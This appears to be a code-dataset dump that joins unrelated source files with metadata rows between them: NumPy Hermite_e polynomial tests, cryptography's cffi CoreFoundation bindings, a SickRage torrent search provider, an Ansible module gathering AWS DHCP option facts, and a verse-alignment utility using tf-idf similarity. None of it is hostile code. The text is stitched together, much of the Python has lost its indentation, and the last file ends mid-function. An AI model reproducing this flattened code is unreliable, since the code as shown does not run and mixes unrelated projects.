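#   np.allclose(herme.herme2poly([0, 0, 0, 1]), He3)   # expected to be True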
def trim(x):
return herme.hermetrim(x, tol=1e-6)
class TestConstants(TestCase):
def test_hermedomain(self):
assert_equal(herme.hermedomain, [-1, 1])
def test_hermezero(self):
assert_equal(herme.hermezero, [0])
def test_hermeone(self):
assert_equal(herme.hermeone, [1])
def test_hermex(self):
assert_equal(herme.hermex, [0, 1])
class TestArithmetic(TestCase):
x = np.linspace(-3, 3, 100)
def test_hermeadd(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] += 1
res = herme.hermeadd([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_hermesub(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] -= 1
res = herme.hermesub([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_hermemulx(self):
assert_equal(herme.hermemulx([0]), [0])
assert_equal(herme.hermemulx([1]), [0, 1])
for i in range(1, 5):
ser = [0]*i + [1]
tgt = [0]*(i - 1) + [i, 0, 1]
assert_equal(herme.hermemulx(ser), tgt)
def test_hermemul(self):
# check values of result
for i in range(5):
pol1 = [0]*i + [1]
val1 = herme.hermeval(self.x, pol1)
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
pol2 = [0]*j + [1]
val2 = herme.hermeval(self.x, pol2)
pol3 = herme.hermemul(pol1, pol2)
val3 = herme.hermeval(self.x, pol3)
assert_(len(pol3) == i + j + 1, msg)
assert_almost_equal(val3, val1*val2, err_msg=msg)
def test_hermediv(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
ci = [0]*i + [1]
cj = [0]*j + [1]
tgt = herme.hermeadd(ci, cj)
quo, rem = herme.hermediv(tgt, ci)
res = herme.hermeadd(herme.hermemul(quo, ci), rem)
assert_equal(trim(res), trim(tgt), err_msg=msg)
class TestEvaluation(TestCase):
# coefficients of 1 + 2*x + 3*x**2
c1d = np.array([4., 2., 3.])
c2d = np.einsum('i,j->ij', c1d, c1d)
c3d = np.einsum('i,j,k->ijk', c1d, c1d, c1d)
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
y = polyval(x, [1., 2., 3.])
def test_hermeval(self):
#check empty input
assert_equal(herme.hermeval([], [1]).size, 0)
        #check normal input
x = np.linspace(-1, 1)
y = [polyval(x, c) for c in Helist]
for i in range(10):
msg = "At i=%d" % i
tgt = y[i]
res = herme.hermeval(x, [0]*i + [1])
assert_almost_equal(res, tgt, err_msg=msg)
#check that shape is preserved
for i in range(3):
dims = [2]*i
x = np.zeros(dims)
assert_equal(herme.hermeval(x, [1]).shape, dims)
assert_equal(herme.hermeval(x, [1, 0]).shape, dims)
assert_equal(herme.hermeval(x, [1, 0, 0]).shape, dims)
def test_hermeval2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, herme.hermeval2d, x1, x2[:2], self.c2d)
#test values
tgt = y1*y2
res = herme.hermeval2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermeval2d(z, z, self.c2d)
assert_(res.shape == (2, 3))
def test_hermeval3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, herme.hermeval3d, x1, x2, x3[:2], self.c3d)
#test values
tgt = y1*y2*y3
res = herme.hermeval3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermeval3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3))
def test_hermegrid2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j->ij', y1, y2)
res = herme.hermegrid2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermegrid2d(z, z, self.c2d)
assert_(res.shape == (2, 3)*2)
def test_hermegrid3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j,k->ijk', y1, y2, y3)
res = herme.hermegrid3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = herme.hermegrid3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3)*3)
class TestIntegral(TestCase):
def test_hermeint(self):
# check exceptions
assert_raises(ValueError, herme.hermeint, [0], .5)
assert_raises(ValueError, herme.hermeint, [0], -1)
assert_raises(ValueError, herme.hermeint, [0], 1, [0, 0])
# test integration of zero polynomial
for i in range(2, 5):
k = [0]*(i - 2) + [1]
res = herme.hermeint([0], m=i, k=k)
assert_almost_equal(res, [0, 1])
# check single integration with integration constant
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [1/scl]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i])
res = herme.herme2poly(hermeint)
assert_almost_equal(trim(res), trim(tgt))
# check single integration with integration constant and lbnd
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i], lbnd=-1)
assert_almost_equal(herme.hermeval(-1, hermeint), i)
# check single integration with integration constant and scaling
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [2/scl]
hermepol = herme.poly2herme(pol)
hermeint = herme.hermeint(hermepol, m=1, k=[i], scl=2)
res = herme.herme2poly(hermeint)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with default k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1)
res = herme.hermeint(pol, m=j)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with defined k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k])
res = herme.hermeint(pol, m=j, k=list(range(j)))
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with lbnd
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k], lbnd=-1)
res = herme.hermeint(pol, m=j, k=list(range(j)), lbnd=-1)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with scaling
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = herme.hermeint(tgt, m=1, k=[k], scl=2)
res = herme.hermeint(pol, m=j, k=list(range(j)), scl=2)
assert_almost_equal(trim(res), trim(tgt))
def test_hermeint_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([herme.hermeint(c) for c in c2d.T]).T
res = herme.hermeint(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeint(c) for c in c2d])
res = herme.hermeint(c2d, axis=1)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeint(c, k=3) for c in c2d])
res = herme.hermeint(c2d, k=3, axis=1)
assert_almost_equal(res, tgt)
class TestDerivative(TestCase):
def test_hermeder(self):
# check exceptions
assert_raises(ValueError, herme.hermeder, [0], .5)
assert_raises(ValueError, herme.hermeder, [0], -1)
        # check that the zeroth derivative does nothing
for i in range(5):
tgt = [0]*i + [1]
res = herme.hermeder(tgt, m=0)
assert_equal(trim(res), trim(tgt))
# check that derivation is the inverse of integration
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = herme.hermeder(herme.hermeint(tgt, m=j), m=j)
assert_almost_equal(trim(res), trim(tgt))
# check derivation with scaling
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = herme.hermeder(
herme.hermeint(tgt, m=j, scl=2), m=j, scl=.5)
assert_almost_equal(trim(res), trim(tgt))
def test_hermeder_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([herme.hermeder(c) for c in c2d.T]).T
res = herme.hermeder(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([herme.hermeder(c) for c in c2d])
res = herme.hermeder(c2d, axis=1)
assert_almost_equal(res, tgt)
class TestVander(TestCase):
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
def test_hermevander(self):
# check for 1d x
x = np.arange(3)
v = herme.hermevander(x, 3)
assert_(v.shape == (3, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], herme.hermeval(x, coef))
# check for 2d x
x = np.array([[1, 2], [3, 4], [5, 6]])
v = herme.hermevander(x, 3)
assert_(v.shape == (3, 2, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], herme.hermeval(x, coef))
def test_hermevander2d(self):
# also tests hermeval2d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3))
van = herme.hermevander2d(x1, x2, [1, 2])
tgt = herme.hermeval2d(x1, x2, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = herme.hermevander2d([x1], [x2], [1, 2])
assert_(van.shape == (1, 5, 6))
def test_hermevander3d(self):
# also tests hermeval3d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3, 4))
van = herme.hermevander3d(x1, x2, x3, [1, 2, 3])
tgt = herme.hermeval3d(x1, x2, x3, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = herme.hermevander3d([x1], [x2], [x3], [1, 2, 3])
assert_(van.shape == (1, 5, 24))
class TestFitting(TestCase):
def test_hermefit(self):
def f(x):
return x*(x - 1)*(x - 2)
# Test exceptions
assert_raises(ValueError, herme.hermefit, [1], [1], -1)
assert_raises(TypeError, herme.hermefit, [[1]], [1], 0)
assert_raises(TypeError, herme.hermefit, [], [1], 0)
assert_raises(TypeError, herme.hermefit, [1], [[[1]]], 0)
assert_raises(TypeError, herme.hermefit, [1, 2], [1], 0)
assert_raises(TypeError, herme.hermefit, [1], [1, 2], 0)
assert_raises(TypeError, herme.hermefit, [1], [1], 0, w=[[1]])
assert_raises(TypeError, herme.hermefit, [1], [1], 0, w=[1, 1])
# Test fit
x = np.linspace(0, 2)
y = f(x)
#
coef3 = herme.hermefit(x, y, 3)
assert_equal(len(coef3), 4)
assert_almost_equal(herme.hermeval(x, coef3), y)
#
coef4 = herme.hermefit(x, y, 4)
assert_equal(len(coef4), 5)
assert_almost_equal(herme.hermeval(x, coef4), y)
#
coef2d = herme.hermefit(x, np.array([y, y]).T, 3)
assert_almost_equal(coef2d, np.array([coef3, coef3]).T)
# test weighting
w = np.zeros_like(x)
yw = y.copy()
w[1::2] = 1
y[0::2] = 0
wcoef3 = herme.hermefit(x, yw, 3, w=w)
assert_almost_equal(wcoef3, coef3)
#
wcoef2d = herme.hermefit(x, np.array([yw, yw]).T, 3, w=w)
assert_almost_equal(wcoef2d, np.array([coef3, coef3]).T)
# test scaling with complex values x points whose square
# is zero when summed.
x = [1, 1j, -1, -1j]
assert_almost_equal(herme.hermefit(x, x, 1), [0, 1])
class TestCompanion(TestCase):
def test_raises(self):
assert_raises(ValueError, herme.hermecompanion, [])
assert_raises(ValueError, herme.hermecompanion, [1])
def test_dimensions(self):
for i in range(1, 5):
coef = [0]*i + [1]
assert_(herme.hermecompanion(coef).shape == (i, i))
def test_linear_root(self):
assert_(herme.hermecompanion([1, 2])[0, 0] == -.5)
class TestGauss(TestCase):
def test_100(self):
x, w = herme.hermegauss(100)
# test orthogonality. Note that the results need to be normalized,
# otherwise the huge values that can arise from fast growing
# functions like Laguerre can be very confusing.
v = herme.hermevander(x, 99)
vv = np.dot(v.T * w, v)
vd = 1/np.sqrt(vv.diagonal())
vv = vd[:, None] * vv * vd
assert_almost_equal(vv, np.eye(100))
# check that the integral of 1 is correct
tgt = np.sqrt(2*np.pi)
assert_almost_equal(w.sum(), tgt)
class TestMisc(TestCase):
def test_hermefromroots(self):
res = herme.hermefromroots([])
assert_almost_equal(trim(res), [1])
for i in range(1, 5):
roots = np.cos(np.linspace(-np.pi, 0, 2*i + 1)[1::2])
pol = herme.hermefromroots(roots)
res = herme.hermeval(roots, pol)
tgt = 0
assert_(len(pol) == i + 1)
assert_almost_equal(herme.herme2poly(pol)[-1], 1)
assert_almost_equal(res, tgt)
def test_hermeroots(self):
assert_almost_equal(herme.hermeroots([1]), [])
assert_almost_equal(herme.hermeroots([1, 1]), [-1])
for i in range(2, 5):
tgt = np.linspace(-1, 1, i)
res = herme.hermeroots(herme.hermefromroots(tgt))
assert_almost_equal(trim(res), trim(tgt))
def test_hermetrim(self):
coef = [2, -1, 1, 0]
# Test exceptions
assert_raises(ValueError, herme.hermetrim, coef, -1)
# Test results
assert_equal(herme.hermetrim(coef), coef[:-1])
assert_equal(herme.hermetrim(coef, 1), coef[:-3])
assert_equal(herme.hermetrim(coef, 2), [0])
def test_hermeline(self):
assert_equal(herme.hermeline(3, 4), [3, 4])
def test_herme2poly(self):
for i in range(10):
assert_almost_equal(herme.herme2poly([0]*i + [1]), Helist[i])
def test_poly2herme(self):
for i in range(10):
assert_almost_equal(herme.poly2herme(Helist[i]), [0]*i + [1])
def test_weight(self):
x = np.linspace(-5, 5, 11)
tgt = np.exp(-.5*x**2)
res = herme.hermeweight(x)
assert_almost_equal(res, tgt)
if __name__ == "__main__":
run_module_suite()
| lgpl-3.0 | 5,875,520,885,668,834,000 | -7,003,204,939,527,368,000 | 32.015474 | 77 | 0.517488 | false |
Ayrx/cryptography | src/_cffi_src/commoncrypto/cf.py | 8 | 3224 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <CoreFoundation/CoreFoundation.h>
"""
TYPES = """
typedef bool Boolean;
typedef signed long OSStatus;
typedef unsigned char UInt8;
typedef uint32_t UInt32;
typedef const void * CFAllocatorRef;
const CFAllocatorRef kCFAllocatorDefault;
typedef ... *CFDataRef;
typedef signed long long CFIndex;
typedef ... *CFStringRef;
typedef ... *CFArrayRef;
typedef ... *CFMutableArrayRef;
typedef ... *CFBooleanRef;
typedef ... *CFErrorRef;
typedef ... *CFNumberRef;
typedef ... *CFTypeRef;
typedef ... *CFDictionaryRef;
typedef ... *CFMutableDictionaryRef;
typedef struct {
...;
} CFDictionaryKeyCallBacks;
typedef struct {
...;
} CFDictionaryValueCallBacks;
typedef struct {
...;
} CFRange;
typedef struct {
...;
} CFArrayCallBacks;
typedef UInt32 CFStringEncoding;
enum {
kCFStringEncodingASCII = 0x0600
};
enum {
kCFNumberSInt8Type = 1,
kCFNumberSInt16Type = 2,
kCFNumberSInt32Type = 3,
kCFNumberSInt64Type = 4,
kCFNumberFloat32Type = 5,
kCFNumberFloat64Type = 6,
kCFNumberCharType = 7,
kCFNumberShortType = 8,
kCFNumberIntType = 9,
kCFNumberLongType = 10,
kCFNumberLongLongType = 11,
kCFNumberFloatType = 12,
kCFNumberDoubleType = 13,
kCFNumberCFIndexType = 14,
kCFNumberNSIntegerType = 15,
kCFNumberCGFloatType = 16,
kCFNumberMaxType = 16
};
typedef int CFNumberType;
const CFDictionaryKeyCallBacks kCFTypeDictionaryKeyCallBacks;
const CFDictionaryValueCallBacks kCFTypeDictionaryValueCallBacks;
const CFArrayCallBacks kCFTypeArrayCallBacks;
const CFBooleanRef kCFBooleanTrue;
const CFBooleanRef kCFBooleanFalse;
"""
FUNCTIONS = """
CFDataRef CFDataCreate(CFAllocatorRef, const UInt8 *, CFIndex);
CFStringRef CFStringCreateWithCString(CFAllocatorRef, const char *,
CFStringEncoding);
CFDictionaryRef CFDictionaryCreate(CFAllocatorRef, const void **,
const void **, CFIndex,
const CFDictionaryKeyCallBacks *,
const CFDictionaryValueCallBacks *);
CFMutableDictionaryRef CFDictionaryCreateMutable(
CFAllocatorRef,
CFIndex,
const CFDictionaryKeyCallBacks *,
const CFDictionaryValueCallBacks *
);
void CFDictionarySetValue(CFMutableDictionaryRef, const void *, const void *);
CFIndex CFArrayGetCount(CFArrayRef);
const void *CFArrayGetValueAtIndex(CFArrayRef, CFIndex);
CFIndex CFDataGetLength(CFDataRef);
void CFDataGetBytes(CFDataRef, CFRange, UInt8 *);
CFRange CFRangeMake(CFIndex, CFIndex);
void CFShow(CFTypeRef);
Boolean CFBooleanGetValue(CFBooleanRef);
CFNumberRef CFNumberCreate(CFAllocatorRef, CFNumberType, const void *);
void CFRelease(CFTypeRef);
CFTypeRef CFRetain(CFTypeRef);
CFMutableArrayRef CFArrayCreateMutable(CFAllocatorRef, CFIndex,
const CFArrayCallBacks *);
void CFArrayAppendValue(CFMutableArrayRef, const void *);
"""
MACROS = """
"""
CUSTOMIZATIONS = """
"""
| bsd-3-clause | -1,246,351,158,686,902,500 | -1,127,182,725,622,564,100 | 27.530973 | 79 | 0.728908 | false |
kingmotley/SickRage | sickbeard/providers/torrentproject.py | 1 | 4736 | # coding=utf-8
# Author: Gonçalo M. (aka duramato/supergonkas) <[email protected]>
#
# URL: https://sickrage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from requests.compat import urljoin
import validators
from sickbeard import logger, tvcache
from sickbeard.common import USER_AGENT
from sickrage.helper.common import convert_size, try_int
from sickrage.providers.torrent.TorrentProvider import TorrentProvider
class TorrentProjectProvider(TorrentProvider): # pylint: disable=too-many-instance-attributes
def __init__(self):
# Provider Init
TorrentProvider.__init__(self, "TorrentProject")
# Credentials
self.public = True
# Torrent Stats
self.minseed = None
self.minleech = None
# URLs
self.url = 'https://torrentproject.se/'
self.custom_url = None
self.headers.update({'User-Agent': USER_AGENT})
# Proper Strings
# Cache
self.cache = tvcache.TVCache(self, search_params={'RSS': ['0day']})
def search(self, search_strings, age=0, ep_obj=None): # pylint: disable=too-many-locals, too-many-branches, too-many-statements
results = []
search_params = {
'out': 'json',
'filter': 2101,
'showmagnets': 'on',
'num': 50
}
for mode in search_strings: # Mode = RSS, Season, Episode
items = []
logger.log(u"Search Mode: {0}".format(mode), logger.DEBUG)
for search_string in search_strings[mode]:
if mode != 'RSS':
logger.log(u"Search string: {0}".format
(search_string.decode("utf-8")), logger.DEBUG)
search_params['s'] = search_string
if self.custom_url:
if not validators.url(self.custom_url):
logger.log("Invalid custom url set, please check your settings", logger.WARNING)
return results
search_url = self.custom_url
else:
search_url = self.url
torrents = self.get_url(search_url, params=search_params, returns='json')
if not (torrents and "total_found" in torrents and int(torrents["total_found"]) > 0):
logger.log(u"Data returned from provider does not contain any torrents", logger.DEBUG)
continue
del torrents["total_found"]
results = []
for i in torrents:
title = torrents[i]["title"]
seeders = try_int(torrents[i]["seeds"], 1)
leechers = try_int(torrents[i]["leechs"], 0)
if seeders < self.minseed or leechers < self.minleech:
if mode != 'RSS':
logger.log(u"Torrent doesn't meet minimum seeds & leechers not selecting : {0}".format(title), logger.DEBUG)
continue
t_hash = torrents[i]["torrent_hash"]
torrent_size = torrents[i]["torrent_size"]
if not all([t_hash, torrent_size]):
continue
download_url = torrents[i]["magnet"] + self._custom_trackers
size = convert_size(torrent_size) or -1
if not all([title, download_url]):
continue
item = {'title': title, 'link': download_url, 'size': size, 'seeders': seeders, 'leechers': leechers, 'hash': t_hash}
if mode != 'RSS':
logger.log(u"Found result: {0} with {1} seeders and {2} leechers".format
(title, seeders, leechers), logger.DEBUG)
items.append(item)
# For each search mode sort all the items by seeders if available
items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
results += items
return results
provider = TorrentProjectProvider()
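# Illustrative sketch (not part of the original provider): a search is driven by a
# dict of mode -> search strings, and each result item carries the fields built in
# `search` above (the show name below is made up):
#   search_strings = {'Episode': ['Some Show S01E02']}
#   results = provider.search(search_strings)
#   # each item: {'title': ..., 'link': <magnet uri>, 'size': ...,
#   #             'seeders': ..., 'leechers': ..., 'hash': ...}
# How SickRage itself schedules provider searches is outside this file; the call above
# only shows the expected input and output shapes.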
| gpl-3.0 | 7,317,385,819,416,479,000 | 9,193,085,951,876,431,000 | 35.992188 | 137 | 0.568321 | false |
sidartaoliveira/ansible | lib/ansible/modules/cloud/amazon/ec2_vpc_dhcp_options_facts.py | 33 | 5092 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vpc_dhcp_options_facts
short_description: Gather facts about dhcp options sets in AWS
description:
- Gather facts about dhcp options sets in AWS
version_added: "2.2"
requirements: [ boto3 ]
author: "Nick Aslanidis (@naslanidis)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
        See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeDhcpOptions.html) for possible filters.
required: false
default: null
dhcp_options_ids:
description:
- Get details of specific DHCP Option ID
- Provide this value as a list
required: false
default: None
aliases: ['DhcpOptionsIds']
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Gather facts about all DHCP Option sets for an account or profile
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
register: dhcp_facts
- name: Gather facts about a filtered list of DHCP Option sets
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
filters:
"tag:Name": "abc-123"
register: dhcp_facts
- name: Gather facts about a specific DHCP Option set by DhcpOptionId
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
DhcpOptionsIds: dopt-123fece2
register: dhcp_facts
'''
RETURN = '''
dhcp_options:
description: The dhcp option sets for the account
returned: always
type: list
changed:
description: True if listing the dhcp options succeeds
type: bool
returned: always
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn, HAS_BOTO3
from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, get_aws_connection_info
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, boto3_tag_list_to_ansible_dict
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
def get_dhcp_options_info(dhcp_option):
dhcp_option_info = {'DhcpOptionsId': dhcp_option['DhcpOptionsId'],
'DhcpConfigurations': dhcp_option['DhcpConfigurations'],
'Tags': boto3_tag_list_to_ansible_dict(dhcp_option['Tags'])}
return dhcp_option_info
def list_dhcp_options(client, module):
params = dict(Filters=ansible_dict_to_boto3_filter_list(module.params.get('filters')))
if module.params.get("dry_run"):
params['DryRun'] = True
if module.params.get("dhcp_options_ids"):
params['DhcpOptionsIds'] = module.params.get("dhcp_options_ids")
try:
all_dhcp_options = client.describe_dhcp_options(**params)
except botocore.exceptions.ClientError as e:
module.fail_json(msg=str(e), exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
results = [camel_dict_to_snake_dict(get_dhcp_options_info(option))
for option in all_dhcp_options['DhcpOptions']]
module.exit_json(dhcp_options=results)
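# Illustrative sketch (not part of the original module): after camel_dict_to_snake_dict,
# each entry returned in `dhcp_options` looks roughly like this (values are made up):
#   {'dhcp_options_id': 'dopt-123fece2',
#    'dhcp_configurations': [{'key': 'domain-name-servers',
#                             'values': [{'value': '10.0.0.2'}]}],
#    'tags': {'Name': 'abc-123'}}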
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters=dict(type='dict', default={}),
dry_run=dict(type='bool', default=False, aliases=['DryRun']),
dhcp_options_ids=dict(type='list', aliases=['DhcpOptionIds'])
)
)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
# Validate Requirements
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.NoCredentialsError as e:
module.fail_json(msg="Can't authorize connection - " + str(e))
# call your function here
results = list_dhcp_options(connection, module)
module.exit_json(result=results)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,786,381,632,088,776,700 | 3,469,813,789,491,895,300 | 31.227848 | 130 | 0.684014 | false |
refstudycentre/versification | util.py | 1 | 11774 |
import numpy as np
import unicodecsv
import codecs
import goslate
import sqlite3
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
def imp_load(filename):
texts = []
books = []
chapters = []
verses = []
# Read in a whole bible
with codecs.open(filename,encoding='utf-8') as f:
bibletext = f.read()
# Split by verse
bible_verses = bibletext.split('$$$')
# Process verses
for verse in bible_verses:
try:
verse = verse.split('\n',1)
ref = verse[0].strip()
text = verse[1].strip()
ref = ref.split('.')
book = ref[0].strip()
cnum = ref[1].strip()
vnum = ref[2].strip()
texts.append(text)
books.append(book)
chapters.append(cnum)
verses.append(vnum)
except IndexError:
pass
return books, chapters, verses, texts
def calculate_similarity(texts, translations):
# Train the tf-idf thingy on the translated texts
tfidf = TfidfVectorizer().fit_transform(texts)
# Build a matrix representation of the similarities between verses
    # This will yield a symmetrical matrix
# TODO: For performance and logical reasons: Only calculate similarity for nearby verses, assume others 0 ?
M = np.array([linear_kernel(tfidf[j:j+1], tfidf).flatten() for j in range(len(texts))])
# Hack(ish): Set similarity with verses of same translation to 0
for i in range(len(M)):
for j in range(i+1):
if translations[i] == translations[j]:
M[i][j] = M[j][i] = 0
# print np.round(M*100,0)
return M
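# Illustrative sketch (not part of the original module), showing the sklearn pattern
# used above on a toy input:
#   texts = ['in the beginning', 'at the start', 'in the beginning']
#   translations = ['A', 'B', 'C']
#   M = calculate_similarity(texts, translations)
#   # M is len(texts) x len(texts); M[0][2] is high because verses 0 and 2 are
#   # identical but come from different translations, while any pair from the same
#   # translation is forced to 0 by the loop above.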
def find_best_couple(M,t):
"""
find best couple in similarity matrix M
the translation(s) of each verse is given in t
"""
# assume values are 0 for verses in same translation
i_max, j_max = np.unravel_index(M.argmax(), M.shape)
P_max = M[i_max, j_max]
return i_max, j_max, P_max
def merge_nodes(M,a,b):
"""
merge indices a and b in similarity matrix M into one supernode,
averaging similarity values between the supernode and other verses
"""
N = len(M)
# calculate a new row (and column) for the supernode
supernode_similarity = [np.average([M[k][a],M[k][b]]) for k in range(N)]
# append the row (this will jumble the verse order...)
newM = np.append(M, np.array(supernode_similarity)[None,:], axis=0)
# append 0 (supernode's similarity with itself) to the row and add it as a column
supernode_similarity.append(0.)
newM = np.append(newM, np.array(supernode_similarity)[:,None], axis=1)
# to preserve verse indices, don't delete
# newM = np.delete(newM,[a,b],axis=0)
# rather make rows a and b 0
# to preserve verse indices, don't delete
# newM = np.delete(newM,[a,b],axis=1)
# rather make columns a and b 0
newM[:,a] = np.zeros_like(newM[:,a])
newM[:,b] = np.zeros_like(newM[:,b])
newM[a,:] = np.zeros_like(newM[a,:])
newM[b,:] = np.zeros_like(newM[b,:])
return newM
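# Illustrative sketch (not part of the original module): merging nodes 0 and 1 of a
# 3x3 similarity matrix appends one supernode row/column whose entries are the
# averages of rows 0 and 1, then zeroes the merged rows and columns:
#   M = np.array([[0., .8, .2],
#                 [.8, 0., .4],
#                 [.2, .4, 0.]])
#   newM = merge_nodes(M, 0, 1)   # newM.shape == (4, 4)
#   # newM[3][2] == np.average([.2, .4]) == 0.3, and rows/cols 0 and 1 are now all 0.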
def group_verses(M, t, numT, P_min = 0.1):
"""
Automatically group verses
t = the translation of each verse
numT = max number of verses in a group = number of translations
"""
t = [[val] for val in t]
N = len(M)
groups = {} # keyed by supernode index
iteration = 0
max_iteration = N
while iteration < max_iteration:
iteration += 1
#print "\t\tGrouping: iteration ",iteration
i,j,P = find_best_couple(M, t)
#print "\t\tbest couple: ",i,j,P
# Stop iterating if similarity gets too low...
if P < P_min:
            break
group = []
# merge supernodes if they exist, else merge nodes:
if i in groups:
group.extend(groups[i])
else:
group.append(i)
if j in groups:
group.extend(groups[j])
else:
group.append(j)
# group now contains all of the verses for the new supernode
if len(group) > numT:
# this grouping is invalid
# prevent it from happening again by making P 0
M[i][j] = 0
else:
# valid grouping. save it.
# Remove the previous supernode groups
if i in groups:
del groups[i]
if j in groups:
del groups[j]
# Create the supernode
M = merge_nodes(M,i,j)
t.append(t[i] + t[j])
# Save the index of the new supernode
supernode_index = len(M)-1
groups[supernode_index] = group
print "\r\t\t",len(groups),
print
return groups
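# Illustrative sketch (not part of the original module): typical use, mirroring the
# `align` driver below -- build the similarity matrix for verses drawn from several
# translations, then group greedily until similarity drops below P_min:
#   M = calculate_similarity(texts_en, translations)
#   groups = group_verses(M, translations, numT=3)   # 3 = number of translations
#   # groups maps a supernode index to a list of verse indices (at most numT per
#   # group), e.g. {12: [0, 5], 13: [1, 6, 11], ...}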
